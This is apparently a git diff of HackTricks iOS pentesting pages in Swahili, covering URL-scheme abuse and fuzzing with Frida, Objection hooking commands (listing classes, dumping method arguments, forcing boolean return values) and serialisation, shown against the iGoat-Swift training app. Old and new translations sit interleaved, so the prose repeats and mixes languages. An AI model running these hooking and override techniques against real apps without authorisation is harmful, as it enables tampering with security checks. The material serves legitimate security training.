Mfano unatolewa ambapo URI `myapp://hostname?data=123876123` inachochea kitendo maalum cha programu. Uthibitisho wa udhaifu ulionekana katika programu ya Skype Mobile, ambayo iliruhusu vitendo vya simu visivyo ruhusiwa kupitia itifaki ya `skype://`. Mipango iliyosajiliwa inaweza kupatikana katika `Info.plist` ya programu chini ya `CFBundleURLTypes`. Programu mbaya zinaweza kutumia hii kwa kujiandikisha tena URIs ili kukamata taarifa nyeti.
### Usajili wa Itifaki za Utafutaji wa Programu
### Usajili wa Mipango ya Maswali ya Programu
Kuanzia iOS 9.0, ili kuangalia ikiwa programu ipo, `canOpenURL:` inahitaji kutangaza itifaki za URL katika `Info.plist` chini ya `LSApplicationQueriesSchemes`. Hii inapunguza itifaki ambazo programu inaweza kuuliza hadi 50, kuimarisha faragha kwa kuzuia uchunguzi wa programu.
Kuanzia iOS 9.0, ili kuangalia kama programu inapatikana, `canOpenURL:` inahitaji kutangaza mipango ya URL katika `Info.plist` chini ya `LSApplicationQueriesSchemes`. Hii inakadiria mipango ambayo programu inaweza kuuliza kuwa 50, ikiongeza faragha kwa kuzuia orodha ya programu.
```xml
<key>LSApplicationQueriesSchemes</key>
<array>
@ -30,9 +31,9 @@ Kuanzia iOS 9.0, ili kuangalia ikiwa programu ipo, `canOpenURL:` inahitaji kutan
<string>url_scheme2</string>
</array>
```
### Jaribio la Kusimamia na Kuthibitisha URL
### Testing URL Handling and Validation
Wabunifu wanapaswa kukagua njia maalum katika msimbo wa chanzo ili kuelewa ujenzi na uthibitisho wa njia ya URL, kama vile `application:didFinishLaunchingWithOptions:` na `application:openURL:options:`. Kwa mfano, Telegram inatumia njia mbalimbali za kufungua URL:
Wakandarasi wanapaswa kuchunguza mbinu maalum katika msimbo wa chanzo ili kuelewa ujenzi wa njia za URL na uthibitishaji, kama vile `application:didFinishLaunchingWithOptions:` na `application:openURL:options:`. Kwa mfano, Telegram inatumia mbinu mbalimbali za kufungua URL:
```swift
func application(_ application: UIApplication, open url: URL, sourceApplication: String?) -> Bool {
self.openUrl(url: url)
@ -56,17 +57,17 @@ self.openUrl(url: url)
return true
}
```
### Jaribio la URL Requests kwa Programu Nyingine
### Testing URL Requests to Other Apps
Njia kama `openURL:options:completionHandler:` ni muhimu kwa kufungua URL kwa ajili ya kuwasiliana na programu nyingine. Kugundua matumizi ya njia kama hizo katika msimbo wa chanzo wa programu ni muhimu kwa kuelewa mawasiliano ya nje.
Mbinu kama `openURL:options:completionHandler:` ni muhimu kwa kufungua URL ili kuingiliana na programu nyingine. Kutambua matumizi ya mbinu kama hizo katika msimbo wa chanzo wa programu ni muhimu kwa kuelewa mawasiliano ya nje.
### Jaribio la Njia Zilizopitwa na Waktu
### Testing for Deprecated Methods
Njia zilizopitwa na waktu za kushughulikia ufunguzi wa URL, kama vile `application:handleOpenURL:` na `openURL:`, zinapaswa kugunduliwa na kufanyiwa ukaguzi kwa ajili ya athari za usalama.
Mbinu zilizopitwa na wakati zinazoshughulikia ufunguzi wa URL, kama `application:handleOpenURL:` na `openURL:`, zinapaswa kutambuliwa na kupitia kwa athari za usalama.
### Fuzzing wa URL Schemes
### Fuzzing URL Schemes
Fuzzing wa URL schemes unaweza kugundua kasoro za kuharibika kwa kumbukumbu. Zana kama [Frida](https://codeshare.frida.re/@dki/ios-url-scheme-fuzzing/) inaweza kusaidia kiotomatiki mchakato huu kwa kufungua URL na mizigo tofauti ili kufuatilia ajali, kama ilivyodhihirishwa na uhariri wa URL katika programu ya iGoat-Swift:
Fuzzing URL schemes inaweza kutambua makosa ya ufisadi wa kumbukumbu. Zana kama [Frida](https://codeshare.frida.re/@dki/ios-url-scheme-fuzzing/) zinaweza kuendesha mchakato huu kwa kufungua URL zenye mzigo tofauti ili kufuatilia ajali, kama inavyoonyeshwa na udanganyifu wa URL katika programu ya iGoat-Swift:
```bash
$ frida -U SpringBoard -l ios-url-scheme-fuzzing.js
[iPhone::SpringBoard]-> fuzz("iGoat", "iGoat://?contactNumber={0}&message={0}")
@ -74,19 +75,20 @@ Watching for crashes from iGoat...
No logs were moved.
Opened URL: iGoat://?contactNumber=0&message=0
```
## Marejeo
## References
* [https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/](https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0075/)
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

91
mobile-pentesting/ios-pentesting/ios-hooking-with-objection.md
View file

@ -1,36 +1,37 @@
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **fuata** sisi kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
Kwa sehemu hii, zana [**Objection**](https://github.com/sensepost/objection) itatumika.\
Kwa sehemu hii, chombo [**Objection**](https://github.com/sensepost/objection) kitatumika.\
Anza kwa kupata kikao cha objection kwa kutekeleza kitu kama:
```bash
objection -d --gadget "iGoat-Swift" explore
objection -d --gadget "OWASP.iGoat-Swift" explore
```
Unaweza pia kutekeleza `frida-ps -Uia` ili kuangalia michakato inayofanya kazi kwenye simu.
You can execute also `frida-ps -Uia` to check the running processes of the phone.
# Uchunguzi wa Msingi wa Programu
# Msingi wa Kuorodhesha programu
## Njia za Programu za Ndani
## Njia za Programu za Mlokole
* `env`: Tafuta njia ambapo programu imehifadhiwa ndani ya kifaa
* `env`: Pata njia ambapo programu imehifadhiwa ndani ya kifaa
```bash
env
Jina Njia
Name Path
----------------- -----------------------------------------------------------------------------------------------
BundlePath /private/var/containers/Bundle/Application/179A6E8B-E7A8-476E-BBE3-B9300F546068/iGoat-Swift.app
CachesDirectory /var/mobile/Containers/Data/Application/A079DF84-726C-4AEA-A194-805B97B3684A/Library/Caches
@ -38,22 +39,22 @@ DocumentDirectory /var/mobile/Containers/Data/Application/A079DF84-726C-4AEA-A1
LibraryDirectory /var/mobile/Containers/Data/Application/A079DF84-726C-4AEA-A194-805B97B3684A/Library
```
## Orodha ya Vifurushi, fremu na maktaba
## Orodha ya Bundles, frameworks na maktaba
* `ios bundles list_bundles`: Orodha ya vifurushi vya programu
* `ios bundles list_bundles`: Orodha ya bundles za programu
```bash
ios bundles list_bundles
Executable Bundle Version Njia
Executable Bundle Version Path
------------ -------------------- --------- -------------------------------------------
iGoat-Swift OWASP.iGoat-Swift 1.0 ...8-476E-BBE3-B9300F546068/iGoat-Swift.app
AGXMetalA9 com.apple.AGXMetalA9 172.18.4 ...tem/Library/Extensions/AGXMetalA9.bundle
```
* `ios bundles list_frameworks`: Orodha ya fremu za nje zinazotumiwa na programu
* `ios bundles list_frameworks`: Orodha ya frameworks za nje zinazotumiwa na programu
```bash
ios bundles list_frameworks
Executable Bundle Version Njia
Executable Bundle Version Path
------------------------------ -------------------------------------------- ---------- -------------------------------------------
ReactCommon org.cocoapods.ReactCommon 0.61.5 ...tle.app/Frameworks/ReactCommon.framework
...vateFrameworks/CoreDuetContext.framework
@ -80,7 +81,7 @@ react_native_image_picker org.cocoapods.react-native-image-picker 2.
```bash
memory list modules
Jina Msingi Ukubwa Njia
Name Base Size Path
----------------------------------- ----------- ------------------- ------------------------------------------------------------------------------
iGoat-Swift 0x104ffc000 2326528 (2.2 MiB) /private/var/containers/Bundle/Application/179A6E8B-E7A8-476E-BBE3-B9300F54...
SubstrateBootstrap.dylib 0x105354000 16384 (16.0 KiB) /usr/lib/substrate/SubstrateBootstrap.dylib
@ -92,11 +93,11 @@ Foundation 0x1ab550000 2732032 (2.6 MiB) /System/L
libobjc.A.dylib 0x1bdc64000 233472 (228.0 KiB) /usr/lib/libobjc.A.dylib
[...]
```
* `memory list exports <module_name>`: Exports ya moduli iliyopakiwa
* `memory list exports <module_name>`: Mipango ya moduli iliyopakiwa
```bash
memory list exports iGoat-Swift
Aina Jina Anwani
Type Name Address
-------- -------------------------------------------------------------------------------------------------------------------------------------- -----------
variable _mh_execute_header 0x104ffc000
function _mdictof 0x10516cb88
@ -115,9 +116,10 @@ variable _ZTVN9couchbase6differ10BaseDifferE
variable _ZTIN9couchbase6differ10BaseDifferE 0x10523c0f8
[..]
```
## Orodha ya darasa za programu
* `ios hooking list classes`: Orodha ya darasa za programu
## Orodha ya madarasa ya APP
* `ios hooking list classes`: Orodha ya madarasa ya programu
```bash
ios hooking list classes
@ -135,7 +137,7 @@ AAAppleTVRequest
AAAttestationSigner
[...]
```
* `ios hooking search classes <search_term>`: Tafuta darasa linalo zawadi ya neno. Unaweza **kutafuta neno la pekee linalohusiana na jina kuu la pakiti** ili kupata darasa kuu za programu kama ilivyo katika mfano:
* `ios hooking search classes <search_term>`: Tafuta darasa ambalo lina neno fulani. Unaweza **kutafuta neno la kipekee linalohusiana na pakiti kuu ya programu** ili kupata madarasa makuu ya programu kama katika mfano:
```bash
ios hooking search classes iGoat
@ -153,9 +155,9 @@ iGoat_Swift.MemoryManagementVC
[...]
```
## Orodha ya njia za darasa
## Orodha ya mbinu za darasa
* `ios hooking list class_methods`: Orodha ya njia za darasa fulani
* `ios hooking list class_methods`: Orodha ya mbinu za darasa maalum
```bash
ios hooking list class_methods iGoat_Swift.RCreditInfo
@ -169,7 +171,7 @@ ios hooking list class_methods iGoat_Swift.RCreditInfo
- initWithValue:
- setCardNumber:
```
* `ios hooking search methods <search_term>`: Tafuta njia inayojumuisha herufi
* `ios hooking search methods <search_term>`: Tafuta mbinu ambayo ina neno fulani
```bash
ios hooking search methods cvv
@ -186,21 +188,21 @@ ios hooking search methods cvv
[iGoat_Swift.CloudMisconfigurationExerciseVC - setCvvTxtField:]
```
# Ufundi wa Msingi wa Kukamata
# Msingi wa Hooking
Sasa umepata **darasa na moduli zilizotumiwa** na programu unaweza kuwa umepata baadhi ya **majina ya darasa na njia ya kuvutia**.
Sasa kwamba umeshawishi **madarasa na moduli** zinazotumiwa na programu unaweza kuwa umepata **majina ya darasa na mbinu za kuvutia**.
## Kukamata njia zote za darasa
## Hook mbinu zote za darasa
* `ios hooking watch class <class_name>`: Kukamata njia zote za darasa, kuchapisha vigezo vya awali na kurudi
* `ios hooking watch class <class_name>`: Hook mbinu zote za darasa, dump kila wakati vigezo vya awali na marejeo
```bash
ios hooking watch class iGoat_Swift.PlistStorageExerciseViewController
```
## Kukamata njia moja
## Hook mbinu moja
* `ios hooking watch method "-[<class_name> <method_name>]" --dump-args --dump-return --dump-backtrace`: Kukamata njia maalum ya darasa na kuchapisha vigezo, nyuma na kurudi kwa njia kila wakati inaitwa
* `ios hooking watch method "-[<class_name> <method_name>]" --dump-args --dump-return --dump-backtrace`: Hook mbinu maalum ya darasa ikidondosha vigezo, marejeo na marejeo ya mbinu kila wakati inapoitwa
```bash
ios hooking watch method "-[iGoat_Swift.BinaryCookiesExerciseVC verifyItemPressed]" --dump-args --dump-backtrace --dump-return
@ -208,13 +210,13 @@ ios hooking watch method "-[iGoat_Swift.BinaryCookiesExerciseVC verifyItemPresse
## Badilisha Kurudi kwa Boolean
* `ios hooking set return_value "-[<class_name> <method_name>]" false`: Hii itafanya njia iliyochaguliwa irudishe boolean iliyotajwa
* `ios hooking set return_value "-[<class_name> <method_name>]" false`: Hii itafanya mbinu iliyochaguliwa irudishe boolean iliyoonyeshwa
```bash
ios hooking set return_value "-[iGoat_Swift.BinaryCookiesExerciseVC verifyItemPressed]" false
```
## Jenereta ya Kukamata
## Tengeneza kigezo cha hooking
* `ios hooking generate simple <class_name>`:
@ -264,16 +266,17 @@ console.log('Leaving - setCvv:');
```
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako inayotangazwa katika HackTricks** au **kupakua HackTricks katika PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au **kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

58
mobile-pentesting/ios-pentesting/ios-protocol-handlers.md
View file

@ -1,34 +1,36 @@
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
# Wapelelezi wa Itifaki ya WebView
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}
# WebView Protocol Handlers
{% hint style="success" %}
Jifunze na fanya mazoezi ya AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Jifunze na fanya mazoezi ya GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
* **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
</details>
{% endhint %}

67
mobile-pentesting/ios-pentesting/ios-serialisation-and-encoding.md
View file

@ -1,25 +1,26 @@
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi mtaalamu na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary>Support HackTricks</summary>
Njia nyingine za kusaidia HackTricks:
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
Msimbo na habari zaidi katika [https://mas.owasp.org/MASTG/iOS/0x06h-Testing-Platform-Interaction/#object-persistence](https://mas.owasp.org/MASTG/iOS/0x06h-Testing-Platform-Interaction/#object-persistence).
Code na maelezo zaidi katika [https://mas.owasp.org/MASTG/iOS/0x06h-Testing-Platform-Interaction/#object-persistence](https://mas.owasp.org/MASTG/iOS/0x06h-Testing-Platform-Interaction/#object-persistence).
## Uundaji wa Vitu katika Maendeleo ya iOS
## Uwekaji wa Vitu katika Maendeleo ya iOS
Katika iOS, **uundaji wa vitu** unahusisha kubadilisha vitu kuwa muundo ambao unaweza kuhifadhiwa au kutumwa kwa urahisi, na kisha kuirudisha kutoka kwenye muundo huu unapohitajika. Itifaki mbili kuu, **`NSCoding`** na **`NSSecureCoding`**, hufanikisha mchakato huu kwa ajili ya darasa la Objective-C au `NSObject` subclasses, kuruhusu vitu kuundwa katika **`NSData`**, muundo ambao unafunga mabufa ya herufi.
Katika iOS, **uwekaji wa vitu** unahusisha kubadilisha vitu kuwa katika muundo ambao unaweza kuhifadhiwa au kuhamishwa kwa urahisi, na kisha kuyajenga tena kutoka katika muundo huu inapohitajika. Protokali mbili kuu, **`NSCoding`** na **`NSSecureCoding`**, zinawezesha mchakato huu kwa ajili ya Objective-C au `NSObject` subclasses, kuruhusu vitu kuwekewa katika **`NSData`**, muundo unaofunga buffer za byte.
### Utekelezaji wa **`NSCoding`**
Ili kutekeleza `NSCoding`, darasa lazima liwe limepokea kutoka kwa `NSObject` au liwe limeandikwa kama `@objc`. Itifaki hii inahitaji utekelezaji wa njia mbili za kuweka na kuondoa mali za kesi:
### **`NSCoding`** Utekelezaji
Ili kutekeleza `NSCoding`, darasa lazima irithi kutoka `NSObject` au iwe imewekwa alama kama `@objc`. Protokali hii inahitaji utekelezaji wa mbinu mbili za kuandika na kusoma mabadiliko ya mfano:
```swift
class CustomPoint: NSObject, NSCoding {
var x: Double = 0.0
@ -36,8 +37,8 @@ self.init(x: aDecoder.decodeDouble(forKey: "x"), name: name)
}
}
```
### **Kuboresha Usalama na `NSSecureCoding`**
Ili kupunguza udhaifu ambapo wadukuzi wanainjekta data kwenye vitu vilivyoundwa tayari, **`NSSecureCoding`** inatoa itifaki iliyoboreshwa. Darasa zinazofuata `NSSecureCoding` lazima thibitishe aina ya vitu wakati wa kudekodea, kuhakikisha kuwa ni aina za vitu zinazotarajiwa tu zinazotengenezwa. Walakini, ni muhimu kuelewa kuwa wakati `NSSecureCoding` inaboresha usalama wa aina, haifanyi data kuwa siri au kuhakikisha uadilifu wake, hivyo inahitaji hatua za ziada za kulinda habari nyeti:
### **Kuimarisha Usalama kwa `NSSecureCoding`**
Ili kupunguza udhaifu ambapo washambuliaji wanaingiza data kwenye vitu vilivyoundwa tayari, **`NSSecureCoding`** inatoa protokali iliyoboreshwa. Madarasa yanayokubaliana na `NSSecureCoding` yanapaswa kuthibitisha aina ya vitu wakati wa ufafanuzi, kuhakikisha kwamba ni aina za vitu zinazotarajiwa pekee ndizo zinazoanzishwa. Hata hivyo, ni muhimu kutambua kwamba ingawa `NSSecureCoding` inaboresha usalama wa aina, haifanyi usimbaji wa data au kuhakikisha uadilifu wake, hivyo inahitaji hatua za ziada za kulinda taarifa nyeti:
```swift
static var supportsSecureCoding: Bool {
return true
@ -45,42 +46,42 @@ return true
let obj = decoder.decodeObject(of: MyClass.self, forKey: "myKey")
```
## Uhifadhi wa Data na `NSKeyedArchiver`
`NSKeyedArchiver` na kifaa chake, `NSKeyedUnarchiver`, inawezesha kuweka alama vitu ndani ya faili na kuvipata baadaye. Mfumo huu ni muhimu kwa ajili ya kudumuisha vitu:
## Data Archiving with `NSKeyedArchiver`
`NSKeyedArchiver` na mwenzake, `NSKeyedUnarchiver`, zinawezesha kuandika vitu kwenye faili na baadaye kuvipata. Mekanism hii ni muhimu kwa kuhifadhi vitu:
```swift
NSKeyedArchiver.archiveRootObject(customPoint, toFile: "/path/to/archive")
let customPoint = NSKeyedUnarchiver.unarchiveObjectWithFile("/path/to/archive") as? CustomPoint
```
### Kutumia `Codable` kwa Ufupishaji wa Ufumaji
Itifaki ya `Codable` ya Swift inaunganisha `Decodable` na `Encodable`, ikirahisisha uwekaji na uondokaji wa vitu kama `String`, `Int`, `Double`, nk., bila jitihada za ziada:
### Using `Codable` for Simplified Serialization
Protokali ya `Codable` ya Swift inachanganya `Decodable` na `Encodable`, ikirahisisha uandishi na usomaji wa vitu kama `String`, `Int`, `Double`, nk, bila juhudi za ziada:
```swift
struct CustomPointStruct: Codable {
var x: Double
var name: String
}
```
